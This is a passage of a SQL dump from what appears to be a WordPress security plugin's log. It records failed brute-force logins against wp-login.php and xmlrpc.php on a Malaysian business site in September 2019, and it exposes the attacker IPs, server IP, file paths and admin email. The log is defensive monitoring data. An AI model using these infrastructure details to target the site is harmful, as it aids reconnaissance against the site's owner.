empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"51.38.128.211\";s:11:\"REMOTE_PORT\";s:5:\"48962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXtOgLJHMfXbWVflP855FQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568362112.9788\";s:12:\"REQUEST_TIME\";s:10:\"1568362112\";}}','notice','2019-09-13 08:08:34','2019-09-13 08:08:33',17782768,19274480,'https://bintara.com.my/wp-login.php',1,0,'51.38.128.211'),(23750,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"37898\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXqwgtE@IXTdLtfMpqaF-gAAAJI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568321666.1589\";s:12:\"REQUEST_TIME\";s:10:\"1568321666\";}}','notice','2019-09-12 20:54:28','2019-09-12 20:54:26',18286664,19582704,'https://bintara.com.my/xmlrpc.php',1,0,'91.227.6.17'),(23751,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-12 21:03:09','2019-09-12 21:03:06',17746904,18210216,'https://bintara.com.my/jabra-panacast/?gclid=Cj0KCQjw2efrBRD3ARIsAEnt0ejcfW-N2euBMGQmja-05r_pNEKox0CBjFs4174mGYayiS7pVUyXESEaAhjeEALw_wcB',1,0,'118.100.92.147'),(23748,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"36098\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXpkqMUdNswmmvQCrHdsEAAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568302249.0211\";s:12:\"REQUEST_TIME\";s:10:\"1568302249\";}}','notice','2019-09-12 15:30:51','2019-09-12 15:30:49',18215352,19512088,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.80.77'),(23749,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"91.227.6.17\";s:11:\"REMOTE_PORT\";s:5:\"37470\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXqwfnKp6BXM7TOrMiGMgAAAARM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568321662.4538\";s:12:\"REQUEST_TIME\";s:10:\"1568321662\";}}','notice','2019-09-12 20:54:23','2019-09-12 20:54:22',17775808,19264656,'https://bintara.com.my/wp-login.php',1,0,'91.227.6.17'),(23747,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"35878\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXpkphH9hy4t63n6zJwI9gAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:10:\"1568302247\";s:12:\"REQUEST_TIME\";s:10:\"1568302246\";}}','notice','2019-09-12 15:30:48','2019-09-12 15:30:47',17701712,19192320,'https://bintara.com.my/wp-login.php',1,0,'128.199.80.77'),(24072,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"41532\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9nnWCCaIOMm5l5jJE-jwAAAQU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630685.2842\";s:12:\"REQUEST_TIME\";s:10:\"1568630685\";}}','notice','2019-09-16 10:44:46','2019-09-16 10:44:45',18254512,19553000,'https://bintara.com.my/xmlrpc.php',1,0,'164.132.100.13'),(24071,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"164.132.100.13\";s:11:\"REMOTE_PORT\";s:5:\"41123\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9nmnPgbK7GuRh1kKnBbgAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630682.3563\";s:12:\"REQUEST_TIME\";s:10:\"1568630682\";}}','notice','2019-09-16 10:44:43','2019-09-16 10:44:42',17739856,19231376,'https://bintara.com.my/wp-login.php',1,0,'164.132.100.13'),(24070,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"53144\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9l4Wf5CPZPc3WLyou87gAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630241.5948\";s:12:\"REQUEST_TIME\";s:10:\"1568630241\";}}','notice','2019-09-16 10:37:22','2019-09-16 10:37:21',18255696,19555464,'https://bintara.com.my/xmlrpc.php',1,0,'153.126.195.38'),(24069,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"153.126.195.38\";s:11:\"REMOTE_PORT\";s:5:\"52466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9l3r1rBLb0GV3O7mTddgAAAFE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630238.9155\";s:12:\"REQUEST_TIME\";s:10:\"1568630238\";}}','notice','2019-09-16 10:37:20','2019-09-16 